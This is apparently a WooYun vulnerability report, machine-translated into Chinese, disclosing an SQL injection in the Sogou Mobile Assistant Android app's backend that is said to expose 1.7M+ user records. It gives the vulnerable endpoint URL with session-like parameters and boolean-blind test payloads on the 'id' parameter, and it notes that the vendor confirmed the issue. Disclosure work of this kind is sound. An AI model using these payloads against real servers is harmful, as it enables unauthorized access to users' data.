漏洞标题 搜狗应用程序有SQL注入(涉及170W +用户数据) 相关制造商 搜狗 漏洞作者 过路人 提交时间 2016-04-28 09: 10 公共时间 2016-06-13 18: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标:搜狗移动助手Android APP 测试在以下地方发现了SQL注入:(注入参数id,布尔盲) http://mobile.zhushou.sogou.com/android/recommend_category_detail.html?iv=25&id=76&start=0&limit=25&uid=ed83a60cea765d52e3c2ced557270c62&vn=5.0.5&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&安培; CELLID=cdma_13844_21874_2&安培; SC=0 有效载荷: id=76且1=1 id=76且1=2 漏洞证明: 1,当前数据库用户
2,用户表
修理计划: 请多指教〜 版权声明:请注明出处。居民A @乌云